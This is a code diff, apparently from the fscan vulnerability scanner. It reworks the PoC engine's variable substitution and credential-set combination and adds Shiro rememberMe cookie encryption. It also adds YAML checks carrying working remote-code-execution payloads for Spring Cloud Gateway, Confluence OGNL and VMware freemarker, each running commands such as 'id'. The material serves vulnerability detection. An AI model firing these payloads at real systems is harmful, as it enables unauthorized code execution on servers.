-			for k := range p.Sets {
-				if strings.Contains(v, k) {
-					if !IsContain(varset, k) && !IsContain(varpay, k) {
-						varset = append(varset, k)
-					}
-				}
-			}
+		if strings.Contains(rule.Path, "{{"+key+"}}") {
+			return true
 		}
-		if n == 0 {
-			success, err = clustersend(oReq, variableMap, req, env, rule)
-			if err != nil {
-				return false, err
-			}
-			if success == false {
-				break
-			}
-		}
-		if len(varset) == 1 {
-		look1:
-			//	(var1 tomcat ,keys[0] username)
-			for _, var1 := range p.Sets[varset[0]] {
-				setMap := cloneMap1(setMapbak)
-				setMap[varset[0]] = var1
-				evalset(env, setMap)
-				rule1 := cloneRules(rule)
-				for k2, v2 := range rule1.Headers {
-					rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+varset[0]+"}}", var1)
-					for _, key := range varpay {
-						rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-					}
-				}
-				rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+varset[0]+"}}", var1)
-				rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+varset[0]+"}}", var1)
-				for _, key := range varpay {
-					rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-					rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-				}
-				success, err = clustersend(oReq, variableMap, req, env, rule)
-				if err != nil {
-					return false, err
-				}
-
-				if success == true {
-					common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, var1))
-					break look1
-				}
-			}
-			if success == false {
-				break
-			}
-		}
-
-		if len(varset) == 2 {
-		look2:
-			//	(var1 tomcat ,keys[0] username)
-			for _, var1 := range p.Sets[varset[0]] { //username
-				for _, var2 := range p.Sets[varset[1]] { //password
-					setMap := cloneMap1(setMapbak)
-					setMap[varset[0]] = var1
-					setMap[varset[1]] = var2
-					evalset(env, setMap)
-					rule1 := cloneRules(rule)
-					for k2, v2 := range rule1.Headers {
-						rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+varset[0]+"}}", var1)
-						rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+varset[1]+"}}", var2)
-						for _, key := range varpay {
-							rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-						}
-					}
-					rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+varset[0]+"}}", var1)
-					rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+varset[0]+"}}", var1)
-					rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+varset[1]+"}}", var2)
-					rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+varset[1]+"}}", var2)
-					for _, key := range varpay {
-						rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-						rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-					}
-					success, err = clustersend(oReq, variableMap, req, env, rule1)
-					if err != nil {
-						return false, err
-					}
-					if success == true {
-						common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, var1, var2))
-						break look2
-					}
-				}
-			}
-			if success == false {
-				break
-			}
-		}
-
-		if len(varset) == 3 {
-		look3:
-			for _, var1 := range p.Sets[keys[0]] {
-				for _, var2 := range p.Sets[keys[1]] {
-					for _, var3 := range p.Sets[keys[2]] {
-						setMap := cloneMap1(setMapbak)
-						setMap[varset[0]] = var1
-						setMap[varset[1]] = var2
-						evalset(env, setMap)
-						rule1 := cloneRules(rule)
-						for k2, v2 := range rule1.Headers {
-							rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
-							rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[1]+"}}", var2)
-							rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[2]+"}}", var3)
-							for _, key := range varpay {
-								rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-							}
-						}
-						rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
-						rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
-						rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
-						rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
-						rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[2]+"}}", var3)
-						rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[2]+"}}", var3)
-						for _, key := range varpay {
-							rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-							rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
-						}
-						success, err = clustersend(oReq, variableMap, req, env, rule)
-						if err != nil {
-							return false, err
-						}
-						if success == true {
-							common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, var1, var2, var3))
-							break look3
-						}
-					}
-				}
-			}
-			if success == false {
-				break
-			}
+		if strings.Contains(rule.Body, "{{"+key+"}}") {
+			return true
 		}
 	}
-	return success, nil
+	return false
+}
+
+func Combo(input ListMap) (output [][]string) {
+	if len(input) > 1 {
+		output = Combo(input[1:])
+		output = MakeData(output, input[0].Value)
+	} else {
+		for _, i := range input[0].Value {
+			output = append(output, []string{i})
+		}
+	}
+	return
+}
+
+func MakeData(base [][]string, nextData []string) (output [][]string) {
+	for i := range base {
+		for _, j := range nextData {
+			output = append(output, append([]string{j}, base[i]...))
+		}
+	}
+	return
 }

 func clustersend(oReq *http.Request, variableMap map[string]interface{}, req *Request, env *cel.Env, rule Rules) (bool, error) {
+	for k1, v1 := range variableMap {
+		_, isMap := v1.(map[string]string)
+		if isMap {
+			continue
+		}
+		value := fmt.Sprintf("%v", v1)
+		for k2, v2 := range rule.Headers {
+			if strings.Contains(v2, "{{"+k1+"}}") {
+				rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
+			}
+		}
+		rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
+		rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
+	}
 	if oReq.URL.Path != "" && oReq.URL.Path != "/" {
 		req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
 	} else {
@@ -619,21 +419,26 @@ func clustersend(oReq *http.Request, variableMap map[string]interface{}, req *Re
 	}
 	// 某些poc没有区分path和query，需要处理
 	req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
-	req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
-
-	newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
+	//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
+	//
+	newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
+	if err != nil {
+		//fmt.Println("[-] newRequest error:",err)
+		return false, err
+	}
 	newRequest.Header = oReq.Header.Clone()
 	for k, v := range rule.Headers {
 		newRequest.Header.Set(k, v)
 	}
 	resp, err := DoRequest(newRequest, rule.FollowRedirects)
+	newRequest = nil
 	if err != nil {
 		return false, err
 	}
 	variableMap["response"] = resp
 	// 先判断响应页面是否匹配search规则
 	if rule.Search != "" {
-		result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
+		result := doSearch(strings.TrimSpace(rule.Search), GetHeader(resp.Headers)+string(resp.Body))
 		if result != nil && len(result) > 0 { // 正则匹配成功
 			for k, v := range result {
 				variableMap[k] = v
@@ -643,9 +448,11 @@ func clustersend(oReq *http.Request, variableMap map[string]interface{}, req *Re
 			return false, nil
 		}
 	}
-
 	out, err := Evaluate(env, rule.Expression, variableMap)
 	if err != nil {
+		if strings.Contains(err.Error(), "Syntax error") {
+			fmt.Println(rule.Expression, err)
+		}
 		return false, err
 	}
 	//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
@@ -675,58 +482,31 @@ func cloneMap(tags map[string]string) map[string]string {
 	return cloneTags
 }

-func cloneMap1(tags map[string]interface{}) map[string]interface{} {
-	cloneTags := make(map[string]interface{})
-	for k, v := range tags {
-		cloneTags[k] = v
+func evalset(env *cel.Env, variableMap map[string]interface{}, k string, expression string) (err error, output string) {
+	out, err := Evaluate(env, expression, variableMap)
+	if err != nil {
+		variableMap[k] = expression
+	} else {
+		switch value := out.Value().(type) {
+		case *UrlType:
+			variableMap[k] = UrlTypeToString(value)
+		case int64:
+			variableMap[k] = int(value)
+		default:
+			variableMap[k] = fmt.Sprintf("%v", out)
+		}
 	}
-	return cloneTags
+	return err, fmt.Sprintf("%v", variableMap[k])
 }

-func IsContain(items []string, item string) bool {
-	for _, eachItem := range items {
-		if eachItem == item {
-			return true
-		}
-	}
-	return false
-}
-
-func evalset(env *cel.Env, variableMap map[string]interface{}) {
-	for k := range variableMap {
-		expression := fmt.Sprintf("%v", variableMap[k])
-		if !strings.Contains(k, "payload") {
-			out, err := Evaluate(env, expression, variableMap)
-			if err != nil {
-				//fmt.Println(err)
-				variableMap[k] = expression
-				continue
-			}
-			switch value := out.Value().(type) {
-			case *UrlType:
-				variableMap[k] = UrlTypeToString(value)
-			case int64:
-				variableMap[k] = fmt.Sprintf("%v", value)
-			case []uint8:
-				variableMap[k] = fmt.Sprintf("%v", out)
-			default:
-				variableMap[k] = fmt.Sprintf("%v", out)
-			}
-		}
-	}
-
-	for k := range variableMap {
-		expression := fmt.Sprintf("%v", variableMap[k])
-		if strings.Contains(k, "payload") {
-			out, err := Evaluate(env, expression, variableMap)
-			if err != nil {
-				//fmt.Println(err)
-				variableMap[k] = expression
-			} else {
-				variableMap[k] = fmt.Sprintf("%v", out)
-			}
-		}
+func evalset1(env *cel.Env, variableMap map[string]interface{}, k string, expression string) (err error, output string) {
+	out, err := Evaluate(env, expression, variableMap)
+	if err != nil {
+		variableMap[k] = expression
+	} else {
+		variableMap[k] = fmt.Sprintf("%v", out)
 	}
+	return err, fmt.Sprintf("%v", variableMap[k])
 }

 func CheckInfoPoc(infostr string) string {
@@ -737,3 +517,12 @@ func CheckInfoPoc(infostr string) string {
 	}
 	return ""
 }
+
+func GetHeader(header map[string]string) (output string) {
+	for name, values := range header {
+		line := fmt.Sprintf("%s: %s\n", name, values)
+		output = output + line
+	}
+	output = output + "\r\n"
+	return
+}
--- a/WebScan/lib/client.go
+++ b/WebScan/lib/client.go
@@ -23,7 +23,7 @@ var (

 func Inithttp(PocInfo common.PocInfo) {
 	//PocInfo.Proxy = "http://127.0.0.1:8080"
-	err := InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
+	err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
 	if err != nil {
 		log.Fatal(err)
 	}
@@ -57,7 +57,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
 		} else {
 			return errors.New("Failed type assertion to DialContext")
 		}
-	}else if DownProxy != "" {
+	} else if DownProxy != "" {
 		if DownProxy == "1" {
 			DownProxy = "http://127.0.0.1:8080"
 		} else if DownProxy == "2" {
@@ -65,7 +65,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
 		} else if !strings.Contains(DownProxy, "://") {
 			DownProxy = "http://127.0.0.1:" + DownProxy
 		}
-		if !strings.HasPrefix(DownProxy,"socks") && !strings.HasPrefix(DownProxy,"http") {
+		if !strings.HasPrefix(DownProxy, "socks") && !strings.HasPrefix(DownProxy, "http") {
 			return errors.New("no support this proxy")
 		}
 		u, err := url.Parse(DownProxy)
--- a/WebScan/lib/eval.go
+++ b/WebScan/lib/eval.go
@@ -5,12 +5,14 @@ import (
 	"compress/gzip"
 	"crypto/md5"
 	"encoding/base64"
+	"encoding/hex"
 	"fmt"
 	"github.com/google/cel-go/cel"
 	"github.com/google/cel-go/checker/decls"
 	"github.com/google/cel-go/common/types"
 	"github.com/google/cel-go/common/types/ref"
 	"github.com/google/cel-go/interpreter/functions"
+	"github.com/shadow1ng/fscan/common"
 	exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
 	"io"
 	"io/ioutil"
@@ -175,6 +177,26 @@ func NewEnvOption() CustomLib {
 				decls.NewInstanceOverload("icontains_string",
 					[]*exprpb.Type{decls.String, decls.String},
 					decls.Bool)),
+			decls.NewFunction("TDdate",
+				decls.NewOverload("tongda_date",
+					[]*exprpb.Type{},
+					decls.String)),
+			decls.NewFunction("shirokey",
+				decls.NewOverload("shiro_key",
+					[]*exprpb.Type{decls.String, decls.String},
+					decls.String)),
+			decls.NewFunction("startsWith",
+				decls.NewInstanceOverload("startsWith_bytes",
+					[]*exprpb.Type{decls.Bytes, decls.Bytes},
+					decls.Bool)),
+			decls.NewFunction("istartsWith",
+				decls.NewInstanceOverload("startsWith_string",
+					[]*exprpb.Type{decls.String, decls.String},
+					decls.Bool)),
+			decls.NewFunction("hexdecode",
+				decls.NewInstanceOverload("hexdecode",
+					[]*exprpb.Type{decls.String},
+					decls.Bytes)),
 		),
 	}
 	c.programOptions = []cel.ProgramOption{
@@ -407,6 +429,75 @@ func NewEnvOption() CustomLib {
 					return types.Bool(strings.Contains(strings.ToLower(string(v1)), strings.ToLower(string(v2))))
 				},
 			},
+			&functions.Overload{
+				Operator: "tongda_date",
+				Function: func(value ...ref.Val) ref.Val {
+					return types.String(time.Now().Format("0601"))
+				},
+			},
+			&functions.Overload{
+				Operator: "shiro_key",
+				Binary: func(key ref.Val, mode ref.Val) ref.Val {
+					v1, ok := key.(types.String)
+					if !ok {
+						return types.ValOrErr(key, "unexpected type '%v' passed to shiro_key", key.Type())
+					}
+					v2, ok := mode.(types.String)
+					if !ok {
+						return types.ValOrErr(mode, "unexpected type '%v' passed to shiro_mode", mode.Type())
+					}
+					cookie := GetShrioCookie(string(v1), string(v2))
+					if cookie == "" {
+						return types.NewErr("%v", "key b64decode failed")
+					}
+					return types.String(cookie)
+				},
+			},
+			&functions.Overload{
+				Operator: "startsWith_bytes",
+				Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
+					v1, ok := lhs.(types.Bytes)
+					if !ok {
+						return types.ValOrErr(lhs, "unexpected type '%v' passed to startsWith_bytes", lhs.Type())
+					}
+					v2, ok := rhs.(types.Bytes)
+					if !ok {
+						return types.ValOrErr(rhs, "unexpected type '%v' passed to startsWith_bytes", rhs.Type())
+					}
+					// 不区分大小写包含
+					return types.Bool(bytes.HasPrefix(v1, v2))
+				},
+			},
+			&functions.Overload{
+				Operator: "startsWith_string",
+				Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
+					v1, ok := lhs.(types.String)
+					if !ok {
+						return types.ValOrErr(lhs, "unexpected type '%v' passed to startsWith_string", lhs.Type())
+					}
+					v2, ok := rhs.(types.String)
+					if !ok {
+						return types.ValOrErr(rhs, "unexpected type '%v' passed to startsWith_string", rhs.Type())
+					}
+					// 不区分大小写包含
+					return types.Bool(strings.HasPrefix(strings.ToLower(string(v1)), strings.ToLower(string(v2))))
+				},
+			},
+			&functions.Overload{
+				Operator: "hexdecode",
+				Unary: func(lhs ref.Val) ref.Val {
+					v1, ok := lhs.(types.String)
+					if !ok {
+						return types.ValOrErr(lhs, "unexpected type '%v' passed to hexdecode", lhs.Type())
+					}
+					out, err := hex.DecodeString(string(v1))
+					if err != nil {
+						return types.ValOrErr(lhs, "hexdecode error: %v", err)
+					}
+					// 不区分大小写包含
+					return types.Bytes(out)
+				},
+			},
 		),
 	}
 	return c
@@ -421,8 +512,9 @@ func (c *CustomLib) ProgramOptions() []cel.ProgramOption {
 	return c.programOptions
 }

-func (c *CustomLib) UpdateCompileOptions(args map[string]string) {
-	for k, v := range args {
+func (c *CustomLib) UpdateCompileOptions(args StrMap) {
+	for _, item := range args {
+		k, v := item.Key, item.Value
 		// 在执行之前是不知道变量的类型的，所以统一声明为字符型
 		// 所以randomInt虽然返回的是int型，在运算中却被当作字符型进行计算，需要重载string_*_string
 		var d *exprpb.Decl
@@ -456,7 +548,7 @@ func reverseCheck(r *Reverse, timeout int64) bool {
 	time.Sleep(time.Second * time.Duration(timeout))
 	sub := strings.Split(r.Domain, ".")[0]
 	urlStr := fmt.Sprintf("http://api.ceye.io/v1/records?token=%s&type=dns&filter=%s", ceyeApi, sub)
-	fmt.Println(urlStr)
+	//fmt.Println(urlStr)
 	req, _ := http.NewRequest("GET", urlStr, nil)
 	resp, err := DoRequest(req, false)
 	if err != nil {
@@ -499,7 +591,6 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
 			req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
 		}
 	}
-
 	var oResp *http.Response
 	var err error
 	if redirect {
@@ -508,11 +599,13 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
 		oResp, err = ClientNoRedirect.Do(req)
 	}
 	if err != nil {
+		//fmt.Println("[-]DoRequest error: ",err)
 		return nil, err
 	}
 	defer oResp.Body.Close()
 	resp, err := ParseResponse(oResp)
 	if err != nil {
+		common.LogError("[-]ParseResponse error: " + err.Error())
 		return nil, err
 	}
 	return resp, err
@@ -575,6 +668,9 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
 	if oResp.Header.Get("Content-Encoding") == "gzip" {
 		gr, err := gzip.NewReader(oResp.Body)
 		if err != nil {
+			if err == io.EOF {
+				err = nil
+			}
 			return nil, err
 		}
 		defer gr.Close()
@@ -582,7 +678,6 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
 			buf := make([]byte, 1024)
 			n, err := gr.Read(buf)
 			if err != nil && err != io.EOF {
-				//utils.Logger.Error(err)
 				return nil, err
 			}
 			if n == 0 {
@@ -591,7 +686,7 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
 			body = append(body, buf...)
 		}
 	} else {
-		raw, err := ioutil.ReadAll(io.LimitReader(oResp.Body, int64(5<<20)))
+		raw, err := ioutil.ReadAll(io.LimitReader(oResp.Body, 10240))
 		if err != nil {
 			return nil, err
 		}
--- a/WebScan/lib/http.pb.go
+++ b/WebScan/lib/http.pb.go
@@ -7,19 +7,98 @@ import (
 	"embed"
 	"fmt"
 	"github.com/golang/protobuf/proto"
-	"gopkg.in/yaml.v3"
+	"gopkg.in/yaml.v2"
 	"io/ioutil"
 	"math"
 	"strings"
 )

 type Poc struct {
-	Name   string              `yaml:"name"`
-	Set    map[string]string   `yaml:"set"`
-	Sets   map[string][]string `yaml:"sets"`
-	Rules  []Rules             `yaml:"rules"`
-	Groups map[string][]Rules  `yaml:"groups"`
-	Detail Detail              `yaml:"detail"`
+	Name   string  `yaml:"name"`
+	Set    StrMap  `yaml:"set"`
+	Sets   ListMap `yaml:"sets"`
+	Rules  []Rules `yaml:"rules"`
+	Groups RuleMap `yaml:"groups"`
+	Detail Detail  `yaml:"detail"`
+}
+
+type MapSlice = yaml.MapSlice
+
+type StrMap []StrItem
+type ListMap []ListItem
+type RuleMap []RuleItem
+
+type StrItem struct {
+	Key, Value string
+}
+
+type ListItem struct {
+	Key   string
+	Value []string
+}
+
+type RuleItem struct {
+	Key   string
+	Value []Rules
+}
+
+func (r *StrMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	var tmp yaml.MapSlice
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+	for _, one := range tmp {
+		key, value := one.Key.(string), one.Value.(string)
+		*r = append(*r, StrItem{key, value})
+	}
+	return nil
+}
+
+//func (r *RuleItem) UnmarshalYAML(unmarshal func(interface{}) error) error {
+//	var tmp yaml.MapSlice
+//	if err := unmarshal(&tmp); err != nil {
+//		return err
+//	}
+//	//for _,one := range tmp{
+//	//	key,value := one.Key.(string),one.Value.(string)
+//	//	*r = append(*r,StrItem{key,value})
+//	//}
+//	return nil
+//}
+
+func (r *RuleMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	var tmp1 yaml.MapSlice
+	if err := unmarshal(&tmp1); err != nil {
+		return err
+	}
+	var tmp = make(map[string][]Rules)
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+
+	for _, one := range tmp1 {
+		key := one.Key.(string)
+		value := tmp[key]
+		*r = append(*r, RuleItem{key, value})
+	}
+	return nil
+}
+
+func (r *ListMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	var tmp yaml.MapSlice
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+	for _, one := range tmp {
+		key := one.Key.(string)
+		var value []string
+		for _, val := range one.Value.([]interface{}) {
+			v := fmt.Sprintf("%v", val)
+			value = append(value, v)
+		}
+		*r = append(*r, ListItem{key, value})
+	}
+	return nil
 }

 type Rules struct {
@@ -30,6 +109,7 @@ type Rules struct {
 	Search          string            `yaml:"search"`
 	FollowRedirects bool              `yaml:"follow_redirects"`
 	Expression      string            `yaml:"expression"`
+	Continue        bool              `yaml:"continue"`
 }

 type Detail struct {
@@ -400,12 +480,12 @@ func LoadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
 	yamlFile, err := Pocs.ReadFile("pocs/" + fileName)

 	if err != nil {
-		fmt.Printf("[-] load poc %s error: %v", fileName, err)
+		fmt.Printf("[-] load poc %s error1: %v\n", fileName, err)
 		return nil, err
 	}
 	err = yaml.Unmarshal(yamlFile, p)
 	if err != nil {
-		fmt.Printf("[-] load poc %s error: %v", fileName, err)
+		fmt.Printf("[-] load poc %s error2: %v\n", fileName, err)
 		return nil, err
 	}
 	return p, err
@@ -429,12 +509,12 @@ func LoadPocbyPath(fileName string) (*Poc, error) {
 	p := &Poc{}
 	data, err := ioutil.ReadFile(fileName)
 	if err != nil {
-		fmt.Printf("[-] load poc %s error: %v", fileName, err)
+		fmt.Printf("[-] load poc %s error3: %v\n", fileName, err)
 		return nil, err
 	}
 	err = yaml.Unmarshal(data, p)
 	if err != nil {
-		fmt.Printf("[-] load poc %s error: %v", fileName, err)
+		fmt.Printf("[-] load poc %s error4: %v\n", fileName, err)
 		return nil, err
 	}
 	return p, err
--- a/WebScan/lib/shiro.go
+++ b/WebScan/lib/shiro.go
@@ -0,0 +1,73 @@
+package lib
+
+import (
+	"bytes"
+	"crypto/aes"
+	"crypto/cipher"
+	"crypto/rand"
+	"encoding/base64"
+	"io"
+
+	uuid "github.com/satori/go.uuid"
+)
+
+var (
+	CheckContent = "rO0ABXNyADJvcmcuYXBhY2hlLnNoaXJvLnN1YmplY3QuU2ltcGxlUHJpbmNpcGFsQ29sbGVjdGlvbqh/WCXGowhKAwABTAAPcmVhbG1QcmluY2lwYWxzdAAPTGphdmEvdXRpbC9NYXA7eHBwdwEAeA=="
+	Content, _   = base64.StdEncoding.DecodeString(CheckContent)
+)
+
+func Padding(plainText []byte, blockSize int) []byte {
+	//计算要填充的长度
+	n := (blockSize - len(plainText)%blockSize)
+	//对原来的明文填充n个n
+	temp := bytes.Repeat([]byte{byte(n)}, n)
+	plainText = append(plainText, temp...)
+	return plainText
+}
+
+func GetShrioCookie(key, mode string) string {
+	if mode == "gcm" {
+		return AES_GCM_Encrypt(key)
+	} else {
+		//cbc
+		return AES_CBC_Encrypt(key)
+	}
+}
+
+//AES CBC加密后的payload
+func AES_CBC_Encrypt(shirokey string) string {
+	key, err := base64.StdEncoding.DecodeString(shirokey)
+	if err != nil {
+		return ""
+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return ""
+	}
+	Content = Padding(Content, block.BlockSize())
+	iv := uuid.NewV4().Bytes()                     //指定初始向量vi,长度和block的块尺寸一致
+	blockMode := cipher.NewCBCEncrypter(block, iv) //指定CBC分组模式，返回一个BlockMode接口对象
+	cipherText := make([]byte, len(Content))
+	blockMode.CryptBlocks(cipherText, Content) //加密数据
+	return base64.StdEncoding.EncodeToString(append(iv[:], cipherText[:]...))
+}
+
+//AES GCM 加密后的payload shiro 1.4.2版本更换为了AES-GCM加密方式
+func AES_GCM_Encrypt(shirokey string) string {
+	key, err := base64.StdEncoding.DecodeString(shirokey)
+	if err != nil {
+		return ""
+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return ""
+	}
+	nonce := make([]byte, 16)
+	_, err = io.ReadFull(rand.Reader, nonce)
+	if err != nil {
+		return ""
+	}
+	aesgcm, _ := cipher.NewGCMWithNonceSize(block, 16)
+	ciphertext := aesgcm.Seal(nil, nonce, Content, nil)
+	return base64.StdEncoding.EncodeToString(append(nonce, ciphertext...))
+}
--- a/WebScan/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml
+++ b/WebScan/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE
+rules:
+  - method: GET
+    path: /jbossmq-httpil/HTTPServerILServlet
+    expression: |
+      response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL')
+detail:
+  author: mamba
+  description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号"
+  links:
+    - https://github.com/chaosec2021
--- a/WebScan/pocs/CVE-2022-22947.yml
+++ b/WebScan/pocs/CVE-2022-22947.yml
@@ -0,0 +1,44 @@
+name: Spring-Cloud-CVE-2022-22947
+set:
+  router: randomLowercase(8)
+  rand1: randomInt(800000000, 1000000000)
+  rand2: randomInt(800000000, 1000000000)
+rules:
+  - method: POST
+    path: /actuator/gateway/routes/{{router}}
+    headers:
+      Content-Type: application/json
+    body: |
+      {
+        "id": "{{router}}",
+        "filters": [{
+          "name": "AddResponseHeader",
+          "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"expr\",\"{{rand1}}\",\"+\",\"{{rand2}}\"}).getInputStream()))}"}
+        }],
+      "uri": "http://example.com",
+      "order": 0
+      }
+    expression: response.status == 201
+  - method: POST
+    path: /actuator/gateway/refresh
+    headers:
+      Content-Type: application/json
+    expression: response.status == 200
+  - method: GET
+    path: /actuator/gateway/routes/{{router}}
+    headers:
+      Content-Type: application/json
+    expression: response.status == 200 && response.body.bcontains(bytes(string(rand1 + rand2)))
+  - method: DELETE
+    path: /actuator/gateway/routes/{{router}}
+    expression: response.status == 200
+  - method: POST
+    path: /actuator/gateway/refresh
+    headers:
+      Content-Type: application/json
+    expression: response.status == 200
+detail:
+  author: jweny
+  description: Spring Cloud Gateway Code Injection
+  links:
+    - https://mp.weixin.qq.com/s/qIAcycsO_L9JKisG5Bgg_w
--- a/WebScan/pocs/CVE-2022-22954-VMware-RCE.yml
+++ b/WebScan/pocs/CVE-2022-22954-VMware-RCE.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-CVE-2022-22954-VMware-RCE
+rules:
+  - method: GET
+    path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d
+    expression: |
+      response.status == 400 && "device id:".bmatches(response.body)
+detail:
+  author: mamba
+  description: "CVE-2022-22954-VMware-RCE by chaosec公众号"
+  links:
+    - https://github.com/chaosec2021
--- a/WebScan/pocs/CVE-2022-26134.yml
+++ b/WebScan/pocs/CVE-2022-26134.yml
@@ -0,0 +1,16 @@
+name: Confluence-CVE-2022-26134
+
+rules:
+ -  method: GET
+    path: /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
+    expression: response.status == 302 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.raw_header)
+detail:
+  author: zan8in
+  description: |
+    Atlassian Confluence OGNL注入漏洞
+    Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。
+    app="ATLASSIAN-Confluence"
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26134
+    - http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-26134.html
+    - https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b9239b1dd
--- a/WebScan/pocs/Hotel-Internet-Manage-RCE.yml
+++ b/WebScan/pocs/Hotel-Internet-Manage-RCE.yml
@@ -2,9 +2,6 @@ name: Hotel-Internet-Manage-RCE
 rules:
  - method: GET
